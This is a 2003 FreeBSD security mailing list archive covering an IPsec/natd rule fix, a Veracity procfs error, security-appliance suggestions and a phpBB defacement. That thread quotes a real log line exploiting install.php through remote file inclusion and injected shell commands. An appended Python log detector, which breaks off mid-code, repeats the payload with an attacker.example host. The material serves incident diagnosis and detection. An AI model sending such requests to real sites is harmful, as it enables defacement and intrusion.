From owner-freebsd-security@FreeBSD.ORG Fri Oct 31 11:13:38 2003
Date: Fri, 31 Oct 2003 11:13:55 -0800
From: "Crist J. Clark" <cristjc@comcast.net>
Reply-To: cjclark@alum.mit.edu
To: security@freebsd.org, net@freebsd.org
Subject: Re: (long) Re: Using racoon-negotiated IPSec with ipfw and natd

On Fri, Oct 31, 2003 at 09:45:25AM -0600, Mark Johnston wrote:
> "Crist J. Clark" wrote:
> > On Thu, Oct 30, 2003 at 03:05:09PM -0600, Mark Johnston wrote:
> > > - gateway receives an ESP packet from mobile (encapsulating a ping).
> > > - gateway decrypts and transmits an ICMP packet to internal with mobile's
> > >   source address.
> > > - internal generates the ICMP response to mobile.
> > > - gateway receives the response, runs it through natd, and sends it out in the
> > >   clear to mobile with gateway's source address.
> >
> > This shouldn't happen. IPsec processing of the outgoing packet happens
> > _before_ it gets passed to ipfw(8) (which hands it to natd(8)) on the
> > external interface.
>
> That's odd. To simplify the situation a bit, I'm testing with a static
> SP/SA set.
> The SPs in place are:
>
> 172.21.0.0/16[any] 192.168.15.0/24[any] any
>         in ipsec
>         esp/tunnel/remoteext-localext/require
>         spid=122 seq=1 pid=12464
>         refcnt=1
> 192.168.15.0/24[any] 172.21.0.0/16[any] any
>         out ipsec
>         esp/tunnel/localext-remoteext/require
>         spid=121 seq=0 pid=12464
>         refcnt=1
>
> (The external IPs are missing but the rest is unchanged.)
>
> I can break and fix the connection by adding and removing firewall rules
> allowing the traffic before the natd divert.
>
> > > What I want to
> > > accomplish, in pseudo-ipfw, is this:
> > >
> > > pass esp from any to me
> > > pass ip from known-sp-sources to 192.168.0.0/24
> > > pass ip from 192.168.0.0/24 to known-sp-destinations
> > > divert natd from 192.168.0.0/24 to any
> >
> > This may be your problem. That rule should be something like,
> >
> > divert natd from 192.168.0.0/24 to any via ${external_if}
> >
> > Is that what you actually have? Are you doing NAT on the internal
> > interface? That would confuse things.
>
> I'm not sure what you mean by "doing NAT". The natd interface (-n) is the
> external one, but I'm diverting to natd using a recv rule on the internal
> interface.

Yep, that's the problem. When I ask where you are "doing NAT" I'm saying
on which interface the ipfw(8) rules pass packets to natd(8). You're
doing NAT all over the place. That's definitely what is causing the
problem here.

For packets entering the system from the network, the processing order is,

  (network) ---> ipfw ---> IPsec ---> (remainder of IP stack)

And outgoing,

  (system) ---> IPsec ---> ipfw ---> (network)

(It's actually a bit more hairy than that, incoming IPsec processed
packets actually get reinjected into the stack below ipfw processing,
but skip ipfw on the second pass, unless IPSEC_FILTERGIF is set.)
Notice I didn't explicitly say where natd(8) happens because ipfw(8)
passes packets to natd(8) and that is completely under your control.
The problem is that the addresses on the packets have been rewritten
before they are sent out the external interface where IPsec processing
would happen.

> The natd setup is a bit hairy, because the box has a DMZ
> interface (dc0) along with external (fxp0) and internal (txp0) NICs, which
> is bridged (dc0-fxp0) instead of routed to match a legacy config. Here's
> my current ipfw setup:
>
> 00100 allow esp from any to me
> 00200 allow ah from any to me
> 00205 allow udp from any to me dst-port 500
> 00210 allow ip from 192.168.15.0/24 to 172.21.0.0/16
> 00220 allow ip from 172.21.0.0/16 to 192.168.15.0/24
> [ more bidirectional allow rules ]
> 00300 deny ip from any to 192.168.15.0/24 in recv fxp0
> 00400 deny ip from any to 192.168.15.0/24 in recv dc0
> 00500 divert 8669 ip from 192.168.15.0/24 to not me recv txp0
> 00600 divert 8668 ip from any to me in recv fxp0
> 00700 divert 8668 ip from any to me in recv dc0
> 00800 allow ip from 192.168.15.0/24 to any recv txp0
> 00900 allow ip from any to 192.168.15.0/24
> 01000 check-state
> [ some allows and denies for fxp0<->dc0 ]
> 01800 allow ip from 192.168.15.0/24 to me
> 01900 allow ip from me to any keep-state
> 65535 deny ip from any to any
>
> Because of the DMZ, I had to tweak the natd setup to use -i 8668 -o 8669
> - if I diverted everything to 8668 and didn't use -i and -o, it was
> interpreting dc0 as "inside", and I couldn't communicate with the DMZ from
> the LAN.

Ouch. Mixing bridging, NAT, and IPsec. (I should talk, my bastion host
at home has one interface with my coax cable connection, another to my
NATed LAN, another to my NATed WLAN which also is all tunneled through
IPsec or PPTP since WEP is broken, and finally some PPP dial-up
interfaces to call into the office. No bridging there, though! Only
bridge on test boxes on the internal LAN.)
What I don't understand is what breaks if you just do,

  500 divert natd ip from 192.168.15.0/24 to any out via fxp0
  600 divert natd ip from any to me in via fxp0

And lose 700. Is there a reason to NAT stuff between the internal
network and DMZ?

> With these rules in place, everything works fine, and I can ping across
> the IPsec link. If I delete 210 and 220, I start to see the pings on fxp0
> destined to the 172.21.x.x address from my external IP.

Exactly, with those rules, you never hit the 'divert' rules on the
internal interface. The packets get processed with their original IP
addresses as they go out fxp0, the IPsec policy is applied, and all
works well. Without those rules, they hit the divert rule as they come
in the internal interface, get the source address rewritten, and then
do not match the IPsec policy when they get processed on the way out
fxp0.
-- 
Crist J. Clark                     |     cjclark@alum.mit.edu
                                   |     cjclark@jhu.edu
http://people.freebsd.org/~cjc/    |     cjc@freebsd.org

From owner-freebsd-security@FreeBSD.ORG Mon Nov 3 09:05:33 2003
Date: Mon, 3 Nov 2003 11:05:32 -0600
From: Mark Johnston <mark@skyweb.ca>
To: cjclark@alum.mit.edu
Cc: net@freebsd.org, security@freebsd.org
Subject: Re: [solved] Using racoon-negotiated IPSec with ipfw and natd

"Crist J. Clark" wrote:
> For packets entering the system from the network, the processing
> order is,
>
> (network) ---> ipfw ---> IPsec ---> (remainder of IP stack)
>
> And outgoing,
>
> (system) ---> IPsec ---> ipfw ---> (network)
>
> (It's actually a bit more hairy than that, incoming IPsec processed
> packets actually get reinjected into the stack below ipfw processing,
> but skip ipfw on the second pass, unless IPSEC_FILTERGIF is set.)
> Notice I didn't explicitly say where natd(8) happens because ipfw(8)
> passes packets to natd(8) and that is completely under your control.
>
> The problem is that the addresses on the packets have been rewritten
> before they are sent out the external interface where IPsec
> processing would happen.

Perfect! Thank you! That's exactly the explanation I needed.

> Ouch. Mixing bridging, NAT, and IPsec. (I should talk, my bastion host
> at home has one interface with my coax cable connection, another to my
> NATed LAN, another to my NATed WLAN which also is all tunneled through
> IPsec or PPTP since WEP is broken, and finally some PPP dial-up
> interfaces to call into the office. No bridging there, though! Only
> bridge on test boxes on the internal LAN.)
>
> What I don't understand is what breaks if you just do,
>
> 500 divert natd ip from 192.168.15.0/24 to any out via fxp0
> 600 divert natd ip from any to me in via fxp0
>
> And lose 700.
> Is there a reason to NAT stuff between the internal
> network and DMZ?

There is - I'm not the DMZ's gateway, and NAT means not having to add
static routes to all the DMZ boxes. The legacy box that this is replacing
(a 3Com SuperStack 3000-series firewall appliance) actually allowed
packets to DMZ hosts by responding to ARPs for their IPs on the WAN port,
then invisibly proxying packets to them, and doing the same trick for
DMZ-WAN traffic. I avoided that fate by bridging, but reconfiguring the
remote box that actually is the DMZ gateway wasn't an option.

For the archives:

Dynamic (roaming) IPsec was not working with racoon on a firewall also
running natd. The problem was that natd was rewriting the packets as they
came in, because of an ipfw rule matching on the internal interface, and
by the time the packets made it to the IPsec layer, they no longer matched
the SP. It was fixed by changing the ipfw rule to match only outgoing
packets, which will already have been processed by IPsec by the time they
get to ipfw on the trip out.

Specifically, I've made one tiny change to my ruleset. I replaced this rule:

  00500 divert 8669 ip from 192.168.15.0/24 to not me recv txp0

with this:

  00500 divert 8669 ip from 192.168.15.0/24 to not me out recv txp0

Adding "out" prevents ipfw from diverting the packet to natd on its way in.
On the way out, the packet has been through IPsec and will no longer match
the "from 192.168.15.0/24" criterion, saving it from diversion again. If
you don't also use a DMZ with bridging, you can do it a lot more easily, as
Crist describes above.
Thanks a lot for your help,
Mark

From owner-freebsd-security@FreeBSD.ORG Tue Nov 4 06:18:15 2003
Date: Tue, 4 Nov 2003 09:18:12 -0500
From: "Robert Collins" <rcollins@hwi.buffalo.edu>
To: freebsd-security@freebsd.org
Subject: Veracity and FreeBSD

I'm trying to get veracity (http://www.rocksoft.com/veracity/), a tripwire
replacement, working on FreeBSD 5.x. When I try and create a snapshot I get
the following error for files sitting on my root partition:

-- snip snip --

  csh.logout
    E: Error opening binary (B) stream of file
       "/etc/csh.logout".
       (OS error message="File is on the procfs (/proc) device.").
    E: Could not obtain attribute B.md5 for this file.
-- snip snip --

I've tried taking both PROCFS and PSEUDOFS out of the kernel, to no avail.
Anyone have any other ideas?

Thanks

-rcollins

From owner-freebsd-security@FreeBSD.ORG Tue Nov 4 10:09:33 2003
Date: Tue, 4 Nov 2003 10:09:32 -0800
From: Kris Kennaway <kris@obsecurity.org>
To: Robert Collins
Cc: freebsd-security@freebsd.org
Subject: Re: Veracity and FreeBSD

On Tue, Nov 04, 2003 at 09:18:12AM -0500, Robert Collins wrote:
> I'm trying to get veracity (http://www.rocksoft.com/veracity/), a tripwire
> replacement, working on FreeBSD 5.x. When I try and create a snapshot I get
> the following error for files sitting on my root partition:
> 
> -- snip snip --
> 
>   csh.logout
>     E: Error opening binary (B) stream of file
>        "/etc/csh.logout".
>        (OS error message="File is on the procfs (/proc) device.").
>     E: Could not obtain attribute B.md5 for this file.
> 
> -- snip snip --
> 
> I've tried taking both PROCFS and PSEUDOFS out of the kernel, to no avail.
> Anyone have any other ideas?

Talk to the authors?

Kris

From owner-freebsd-security@FreeBSD.ORG Tue Nov 4 12:19:26 2003
Date: Tue, 04 Nov 2003 12:18:49 -0800
From: richard childers / kg6hac <fscked@pacbell.net>
To: freebsd-security@freebsd.org
Subject: Re: veracity & freebsd (freebsd-security Digest, Vol 32, Issue 2)

> I'm trying to get veracity (http://www.rocksoft.com/veracity/), a tripwire
> replacement, working on FreeBSD 5.x. When I try and create a snapshot I get
> the following error for files sitting on my root partition:
>
> -- snip snip --
>
>   csh.logout
>     E: Error opening binary (B) stream of file
>        "/etc/csh.logout".
>        (OS error message="File is on the procfs (/proc) device.").
>     E: Could not obtain attribute B.md5 for this file.
>
> -- snip snip --
>

I wonder if Veracity(tm) originated in a UNIX environment?

Regards,

Richard Childers / Senior Engineer
Daemonized Networking Services
https://www.daemonized.com
(415) 759-5571

From owner-freebsd-security@FreeBSD.ORG Tue Nov 4 16:47:23 2003
Date: Tue, 4 Nov 2003 19:47:16 -0500 (EST)
From: "Robert Collins" <rcollins@hwi.buffalo.edu>
To: "Kris Kennaway"
Cc: freebsd-security@freebsd.org
Subject: Re: Veracity and FreeBSD

> On Tue, Nov 04, 2003 at 09:18:12AM -0500, Robert Collins wrote:
>> I'm trying to get veracity (http://www.rocksoft.com/veracity/), a
>> tripwire replacement, working on FreeBSD 5.x. When I try and create
>> a snapshot I get the following error for files sitting on my root
>> partition:
>>
>> -- snip snip --
>>
>>   csh.logout
>>     E: Error opening binary (B) stream of file
>>        "/etc/csh.logout".
>>        (OS error message="File is on the procfs (/proc) device.").
>>     E: Could not obtain attribute B.md5 for this file.
>>
>> -- snip snip --
>>
>> I've tried taking both PROCFS and PSEUDOFS out of the kernel, to no
>> avail.
>> Anyone have any other ideas?
>
> Talk to the authors?
>

Kris,

The last line of my e-mail was originally "Anyone have any other ideas
before I go back to trying to contact their non-existent technical
support?" But I figured I would be nice. :)

I spoke to someone from rocksoft, but it's a long uninformative story.

Thanks for the idea though.

-rcollins

From owner-freebsd-security@FreeBSD.ORG Tue Nov 4 17:28:31 2003
Date: Wed, 05 Nov 2003 11:58:21 +1030
From: Kim Needham <kim.needham@rocksoft.com>
To: "Robert Collins"
Cc: freebsd-security@freebsd.org
Subject: Re: Veracity and FreeBSD

This is caused by a check that determines if the /proc filesystem is on
the same device as the file being read to prevent reading in files of
infinite length.
Since FreeBSD 5.x seems to no longer use a mounted proc filesystem but proc
is mounted on the root device, this check will need to be removed for
FreeBSD 5.x.

In theory you could remove the /proc directory though I have no idea what
bad effects that will have, especially if you are using anything that runs
in compatibility mode. (Someone more up to date with the changes to FreeBSD
5.x could inform you as to the problems this may cause)

Otherwise we will have a new version shortly that will have this problem
corrected.

Kim Needham (kim.needham@rocksoft.com)
Network Engineer, Rocksoft Limited.
Ph: +61 8 8232 6262   Fax: +61 8 8232 6264
http://www.rocksoft.com/
Protect your files with Veracity data integrity: http://www.veracity.com/

> > On Tue, Nov 04, 2003 at 09:18:12AM -0500, Robert Collins wrote:
> >> I'm trying to get veracity (http://www.rocksoft.com/veracity/), a
> >> tripwire replacement, working on FreeBSD 5.x. When I try and create
> >> a snapshot I get the following error for files sitting on my root
> >> partition:
> >>
> >> -- snip snip --
> >>
> >>   csh.logout
> >>     E: Error opening binary (B) stream of file
> >>        "/etc/csh.logout".
> >>        (OS error message="File is on the procfs (/proc) device.").
> >>     E: Could not obtain attribute B.md5 for this file.
> >>
> >> -- snip snip --
> >>
> >> I've tried taking both PROCFS and PSEUDOFS out of the kernel, to no
> >> avail.
> >> Anyone have any other ideas?
> >
> > Talk to the authors?
> >
> Kris,
>
> The last line of my e-mail was originally "Anyone have any other ideas
> before I go back to trying to contact their non-existent technical
> support?" But I figured I would be nice. :)
>
> I spoke to someone from rocksoft, but it's a long uninformative story.
>
> Thanks for the idea though.
> -rcollins

From owner-freebsd-security@FreeBSD.ORG Wed Nov 5 03:48:25 2003
Date: Wed, 5 Nov 2003 13:48:21 +0200
From: Sheldon Hearn <sheldonh@starjuice.net>
To: Kim Needham
Cc: freebsd-security@freebsd.org
Subject: Re: Veracity and FreeBSD

On (2003/11/05 11:58), Kim Needham wrote:
> This is caused by a check that determines if the /proc filesystem is on
> the same device as the file being read to prevent reading in files of
> infinite length.
> Since FreeBSD 5.x seems to no longer use a mounted proc filesystem but proc
> is mounted on the root device, this check will need to be removed for
> FreeBSD 5.x.

That doesn't sound like a "long uninformative story".

Thanks for the feedback. Vendor support of FreeBSD is always appreciated. :-)

Ciao,
Sheldon.

From owner-freebsd-security@FreeBSD.ORG Wed Nov 5 10:02:02 2003
Date: Wed, 5 Nov 2003 10:01:58 -0800 (PST)
From: twig les <twigles@yahoo.com>
To: freebsd-security@freebsd.org
Subject: FBSD All-in-one security box?

Hey *, as I sweat through another day of crap dealing with an all-in-one
box (firewall, IDS, AVS, report generating, soon to be a VPN server) I'm
wondering if someone has started a project to put some freeware together
in some semblance of sanity on a FBSD box. There's basically nothing that
this box does that a combo of IPFW (or another bsd filter), snort, ntop,
and some other freeware stuff can't do.
As usual the problems I face stem from feature-overload, since the vendor
has one crappy feature and then adds another crappy feature instead of
fixing the first one so they can market the box better. I'm thinking that
since the tools I mentioned are already fairly mature and robust, all
that's needed is some sewing and, when core functionality is achieved, a
GUI.

This sounds like a fun project IMO, but I don't want to re-invent the
wheel, especially when I have no spare time.

=====
-----------------------------------------------------------
Get a taste of Religion ... eat a priest!
-----------------------------------------------------------

From owner-freebsd-security@FreeBSD.ORG Wed Nov 5 10:10:11 2003
Date: Wed, 05 Nov 2003 19:09:21 +0100
From: "Devon H. O'Dell" <dodell@sitetronics.com>
Cc: freebsd-security@freebsd.org
Subject: Re: FBSD All-in-one security box?

twig les wrote:
> Hey *, as I sweat through another day of crap dealing with an
> all-in-one box (firewall, IDS, AVS, report generating, soon to
> be a VPN server) I'm wondering if someone has started a project
> to put some freeware together in some semblance of sanity on a
> FBSD box. There's basically nothing that this box does that a
> combo of IPFW (or another bsd filter), snort, ntop, and some
> other freeware stuff can't do.
>
> As usual the problems I face stem from feature-overload, since
> the vendor has one crappy feature and then adds another crappy
> feature instead of fixing the first one so they can market the
> box better. I'm thinking that since the tools I mentioned are
> already fairly mature and robust, all that's needed is some
> sewing and, when core functionality is achieved, a GUI.
>
> This sounds like a fun project IMO, but I don't want to
> re-invent the wheel, especially when I have no spare time.
>

Hey Twig,

I'm currently working on one of these 'crappy appliances' as you call them
(except this one rocks). It'd be helpful for us to know what kinds of
problems your appliance has/what beef you have with it so we can make ours
better. Sorry that this reply is a bit off-topic, since you're looking for
a freeware one.
Perhaps when we've made our fortune on it we can be arsed to release it BSD-style (no guarantees though, of course :)). Hope to hear from you soon! Kind regards, Devon H. O'Dell From owner-freebsd-security@FreeBSD.ORG Wed Nov 5 12:41:13 2003 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D0AE716A4CE for ; Wed, 5 Nov 2003 12:41:13 -0800 (PST) Received: from smtp.infracaninophile.co.uk (happy-idiot-talk.infracaninophile.co.uk [81.2.69.218]) by mx1.FreeBSD.org (Postfix) with ESMTP id E0C4643FE5 for ; Wed, 5 Nov 2003 12:41:07 -0800 (PST) (envelope-from m.seaman@infracaninophile.co.uk) Received: from happy-idiot-talk.infracaninophile.co.uk (localhost [127.0.0.1]) hA5KeXwk054367 (version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NO); Wed, 5 Nov 2003 20:41:03 GMT (envelope-from matthew@happy-idiot-talk.infracaninophile.co.uk) Received: (from matthew@localhost)id hA5KeXXW054366; Wed, 5 Nov 2003 20:40:33 GMT (envelope-from matthew) Date: Wed, 5 Nov 2003 20:40:33 +0000 From: Matthew Seaman To: twig les Message-ID: <20031105204033.GB53439@happy-idiot-talk.infracaninophile.co.uk> Mail-Followup-To: twig les , freebsd-security@freebsd.org References: <20031105180158.48435.qmail@web60408.mail.yahoo.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="WYTEVAkct0FjGQmd" Content-Disposition: inline In-Reply-To: <20031105180158.48435.qmail@web60408.mail.yahoo.com> User-Agent: Mutt/1.5.4i X-Spam-Status: No, hits=-4.8 required=5.0 tests=AWL,BAYES_00 autolearn=ham version=2.60 X-Spam-Checker-Version: SpamAssassin 2.60 (1.212-2003-09-23-exp) on happy-idiot-talk.infracaninophile.co.uk cc: freebsd-security@freebsd.org Subject: Re: FBSD All-in-one security box? 
On Wed, Nov 05, 2003 at 10:01:58AM -0800, twig les wrote:
> Hey *, as I sweat through another day of crap dealing with an
> all-in-one box (firewall, IDS, AVS, report generating, soon to
> be a VPN server) I'm wondering if someone has started a project
> to put some freeware together in some semblance of sanity on a
> FBSD box. There's basically nothing that this box does that a
> combo of IPFW (or another bsd filter), snort, ntop, and some
> other freeware stuff can't do.

http://www.exoserver.com/ perhaps? I believe these are FreeBSD based --
they certainly have people with @FreeBSD.org addresses working for
them...

Cheers,

Matthew

-- 
Dr Matthew J Seaman MA, D.Phil.                       26 The Paddocks
                                                      Savill Way
PGP: http://www.infracaninophile.co.uk/pgpkey         Marlow
Tel: +44 1628 476614                                  Bucks., SL7 1TH UK

From owner-freebsd-security@FreeBSD.ORG Wed Nov 5 12:50:18 2003
From: Art Mason
To: freebsd-security@freebsd.org
Date: Wed, 05 Nov 2003 14:50:10 -0600
Organization: Rackspace Managed Hosting
Subject: Re: FBSD All-in-one security box?
Message-Id: <1068065410.305.10.camel@mizar.rackspace.com>
In-Reply-To: <20031105180158.48435.qmail@web60408.mail.yahoo.com>
Hmmm, sounds a lot like Mandrake MNF
(http://www.mandrakesoft.com/products/mnf) hopes to become. I'd love
to see something like this (PHP and PERL frontend) for a FreeBSD-based
wonder box. I wonder if one could take the m0n0wall project
(http://m0n0.ch/wall/) and expand it for a full blown network appliance.

On Wed, 2003-11-05 at 12:01, twig les wrote:
> Hey *, as I sweat through another day of crap dealing with an
> all-in-one box (firewall, IDS, AVS, report generating, soon to
> be a VPN server) I'm wondering if someone has started a project
> to put some freeware together in some semblance of sanity on a
> FBSD box. There's basically nothing that this box does that a
> combo of IPFW (or another bsd filter), snort, ntop, and some
> other freeware stuff can't do.
> 
> As usual the problems I face stem from feature-overload, since
> the vendor has one crappy feature and then adds another crappy
> feature instead of fixing the first one so they can market the
> box better. I'm thinking that since the tools I mentioned are
> already fairly mature and robust, all that's needed is some
> sewing and, when core functionality is achieved, a GUI.
> 
> This sounds like a fun project IMO, but I don't want to
> re-invent the wheel, especially when I have no spare time.
> 
> =====
> -----------------------------------------------------------
> Get a taste of Religion ... eat a priest!
> -----------------------------------------------------------
> 
> _______________________________________________
> freebsd-security@freebsd.org mailing list
> http://lists.freebsd.org/mailman/listinfo/freebsd-security
> To unsubscribe, send any mail to "freebsd-security-unsubscribe@freebsd.org"
-- 
Art Mason
Rackspace Managed Hosting
amason@rackspace.com

From owner-freebsd-security@FreeBSD.ORG Thu Nov 6 01:17:14 2003
From: "Kurilov D.I."
To: freebsd-security@freebsd.org
Reply-To: kurilov@tscp.ru
Date: 06 Nov 2003 14:22:06 +0500
Subject: 
Message-Id: <1068110526.3125.14.camel@dmk.tscp.ru>

From owner-freebsd-security@FreeBSD.ORG Thu Nov 6 01:20:14 2003
From: "Kurilov D.I."
To: freebsd-security@freebsd.org
Reply-To: kurilov@tscp.ru
Date: 06 Nov 2003 14:25:09 +0500
Subject: kurilov@tscp.ru
Message-Id: <1068110709.3125.20.camel@dmk.tscp.ru>

From owner-freebsd-security@FreeBSD.ORG Thu Nov 6 03:45:03 2003
From: "G.
Panula"
To: freebsd-security@freebsd.org
Date: Thu, 06 Nov 2003 05:44:57 -0600
Subject: Re: FBSD All-in-one security box?
Message-ID: <3FAA3439.5040602@lexisnexis.com>
In-Reply-To: <20031105180158.48435.qmail@web60408.mail.yahoo.com>

twig les wrote:
> Hey *, as I sweat through another day of crap dealing with an
> all-in-one box (firewall, IDS, AVS, report generating, soon to
> be a VPN server) I'm wondering if someone has started a project
> to put some freeware together in some semblance of sanity on a
> FBSD box. There's basically nothing that this box does that a
> combo of IPFW (or another bsd filter), snort, ntop, and some
> other freeware stuff can't do.
> 
> As usual the problems I face stem from feature-overload, since
> the vendor has one crappy feature and then adds another crappy
> feature instead of fixing the first one so they can market the
> box better. I'm thinking that since the tools I mentioned are
> already fairly mature and robust, all that's needed is some
> sewing and, when core functionality is achieved, a GUI.
> 
> This sounds like a fun project IMO, but I don't want to
> re-invent the wheel, especially when I have no spare time.
> 

http://www.netboz.net/ is a self-contained bootable CD that provides
firewall, NAT, DNS, DHCP and VPN (in beta currently). Just need a floppy
to write configs to and you're off & running. Yup, it's fbsd based.
I've only played with it a little, but it was solid enough. I think it
is just missing IDS & AVS from your wishlist above.

Online demo available at: https://demo.netboz.net/

greg

From owner-freebsd-security@FreeBSD.ORG Thu Nov 6 08:42:59 2003
From: "Bruce A. Mah"
Reply-To: bmah@FreeBSD.org
To: Art Mason
Cc: freebsd-security@FreeBSD.org
Date: Thu, 06 Nov 2003 08:42:57 -0800
Subject: Re: FBSD All-in-one security box?
Message-Id: <200311061642.hA6Ggv1j071871@intruder.kitchenlab.org>
In-Reply-To: <1068065410.305.10.camel@mizar.rackspace.com>
If memory serves me right, Art Mason wrote:
> Hmmm, sounds a lot like Mandrake MNF
> (http://www.mandrakesoft.com/products/mnf) hopes to become. I'd love
> to see something like this (PHP and PERL frontend) for a FreeBSD-based
> wonder box. I wonder if one could take the m0n0wall project
> (http://m0n0.ch/wall/) and expand it for a full blown network appliance.

I'm using a Soekris 4501 running m0n0wall as a filtering bridge at home.
It's quite a nice package IMHO, although a little difficult to customize
if you want to hack on it. (The single feature I would love to see most
in m0n0wall is a way to check out a source tree, type "make release",
and wind up with an update image.)

Bruce.

From owner-freebsd-security@FreeBSD.ORG Thu Nov 6 10:44:22 2003
From: des@des.no (Dag-Erling Smørgrav)
To: Kim Needham
Cc: freebsd-security@freebsd.org, Robert Collins
Date: Thu, 06 Nov 2003 19:44:11 +0100
Subject: Re: Veractiy and FreeBSD
In-Reply-To: <5.2.0.9.0.20031105114806.00b34b98@mail.chariot.net.au> (Kim Needham's message of "Wed, 05 Nov 2003 11:58:21 +1030")

Kim Needham writes:
> Since FreeBSD 5.x seems to no longer use a mounted proc filesystem but proc
> is mounted on the root device, this check will need to be removed for
> FreeBSD 5.x.

Bollocks. The only practical difference between procfs in 4.x and 5.x
is that it is not mounted by default in 5.x.

To the original poster, removing PSEUDOFS and PROCFS from the kernel
achieves absolutely nothing, as mount_procfs will simply load the
module. You need to unmount /proc, remove the corresponding line from
/etc/fstab, and read a book or two about Unix system administration
(Nemeth, Snyder, Seebass, Hein is a good start)

DES
-- 
Dag-Erling Smørgrav - des@des.no

From owner-freebsd-security@FreeBSD.ORG Fri Nov 7 04:08:32 2003
From: Marco Trentini
Date: Fri, 07 Nov 2003 13:08:26 +0100
Message-ID: <3FAB8B3A.7020908@remotelab.org>
Reply-To: mark@remotelab.org
To: Miha Nedok
Cc: stable@freebsd.org, security@freebsd.org
Subject: Re: hack ? - urgent
In-Reply-To: <20031107125529.R19165@voyager.zrcalo.si>

Miha Nedok wrote:
> Hi !
> 
> Today I have noticed some modified index.html files on some of our vhosts.
> Is it Apache related ? Does anyone know about this ?
> 
> The content is following:
> IR4DEX ownz you FreeBSD - contato: ir4dex@hotmail.com

Is your Apache version up to date?

Maybe IR4DEX knows more about it :)

-- 
Marco Trentini mark@remotelab.org
http://www.remotelab.org/

From owner-freebsd-security@FreeBSD.ORG Fri Nov 7 05:04:01 2003
From: "paris stefas"
To: mike@voyager.unix-systems.net
Cc: stable@freebsd.org, security@freebsd.org
Date: Fri, 07 Nov 2003 13:04:00 +0000
Subject: Re: hack ? - urgent

Dude, you got defaced probably or someone from the inside has a great
sense of humour :-P

>From: Marco Trentini
>Reply-To: mark@remotelab.org
>To: Miha Nedok
>CC: stable@freebsd.org, security@freebsd.org
>Subject: Re: hack ? - urgent
>Date: Fri, 07 Nov 2003 13:08:26 +0100
>
>Miha Nedok wrote:
>>Hi !
>>
>>Today I have noticed some modified index.html files on some of our vhosts.
>>Is it Apache related ? Does anyone know about this ?
>>
>>The content is following:
>>IR4DEX ownz you FreeBSD - contato: ir4dex@hotmail.com
>
>Is your Apache version up to date?
>
>Maybe IR4DEX knows more about it :)
>
>-- 
>Marco Trentini mark@remotelab.org
>http://www.remotelab.org/

From owner-freebsd-security@FreeBSD.ORG Fri Nov 7 11:49:03 2003
From: "Kevin D. Kinsey, DaleCo, S.P."
To: Miha Nedok
Cc: freebsd-security@freebsd.org
Date: Fri, 07 Nov 2003 13:48:42 -0600
Subject: Re: hack ? - urgent - false FreeBSD alarm
Message-ID: <3FABF71A.7000903@daleco.biz>
In-Reply-To: <20031107132650.H19165@voyager.zrcalo.si>

Miha Nedok wrote:
>Hi !
>
>It is phpBB related. I found in logs:
>200.211.35.130 - - [07/Nov/2003:11:27:01 +0100] "GET
>/forum/install.php?phpbb_root_dir=http://www.creatividade.hpg.com.br/&cmd=cd%20..;cd%20..;cd%20www.site-name.si;echo%20IR4DEX%20ownz%20you%20FreeBSD%20-%20contato:%20ir4dex@hotmail.com%20>%20index.html
>HTTP/1.1" 200 904 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
>
>I just did chmod 000 `find -name 'install.php'` for a workaround.
>
>Apache is latest: Nov 3 18:08 apache+mod_ssl-1.3.28+2.8.15_2 .
>
>-Miha

From ~/phpp/docs/Install.html:

_6. Important post-Install tasks for all installation methods_

Once you have successfully installed phpBB 2.0.0 you *MUST* ensure you
remove install.php, upgrade.php and update_to_FINAL.php files. Leaving
these in place is a _very serious potential security issue_.
Additionally you may delete the db/schemas, docs/ and contrib/
directories if you wish.
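A log check for the request shape Miha pasted, added here as an example and not part of the thread or of phpBB: it parses Apache combined-format lines, percent-decodes the query string, and flags three things that are all visible in his log line: a request for one of the installer scripts the phpBB docs above say to delete, an include-path parameter (phpbb_root_dir and the like) whose value is an absolute URL to another host, and a parameter value carrying shell metacharacters. The sample log, the 203.0.113.5 and 198.51.100.7 addresses and the attacker.example host are constructed for the example. The HTTP status is kept in the report on purpose: Miha's real line returned 200, meaning install.php ran, whereas after his chmod 000 workaround the same probe gets a 403, and the rule should still fire so you know who is still scanning for it.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Apache "combined" log line, the format Miha's excerpt is in, e.g.
#   203.0.113.5 - - [07/Nov/2003:11:27:01 +0100] "GET /x?y=z HTTP/1.1" 200 904 "-" "UA"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Installer/upgrader scripts the phpBB 2.0 docs say to delete after installation.
INSTALLER_SCRIPTS = {"install.php", "upgrade.php", "update_to_final.php"}

# Parameter-name suffixes that usually end up in an include()/require() path.
INCLUDE_KEY_SUFFIXES = ("dir", "path", "root", "file", "page")

# Shell metacharacters that have no business inside a forum parameter.
SHELL_META = re.compile(r"[;&|`$<>]")

# Constructed sample log (not from the thread): one exploit attempt that got a
# 200, two benign requests, and a repeat probe after install.php was made
# unreadable with chmod 000, which Apache answers with 403.
SAMPLE_LOG = """\
203.0.113.5 - - [07/Nov/2003:11:27:01 +0100] "GET /forum/install.php?phpbb_root_dir=http://attacker.example/&cmd=cd%20..;cd%20..;cd%20www.example.si;echo%20owned%20>%20index.html HTTP/1.1" 200 904 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
198.51.100.7 - - [07/Nov/2003:11:30:12 +0100] "GET /forum/viewtopic.php?t=42&start=15 HTTP/1.1" 200 18231 "http://www.example.si/forum/" "Mozilla/5.0 (X11; U; FreeBSD i386)"
198.51.100.7 - - [07/Nov/2003:11:31:40 +0100] "GET /forum/login.php?redirect=http://www.example.si/forum/ HTTP/1.1" 302 0 "-" "Mozilla/5.0 (X11; U; FreeBSD i386)"
203.0.113.5 - - [07/Nov/2003:12:05:33 +0100] "GET /forum/install.php?phpbb_root_dir=http://attacker.example/ HTTP/1.1" 403 295 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
"""


def split_query(query):
    """Split a query string on '&' only and percent-decode each side.

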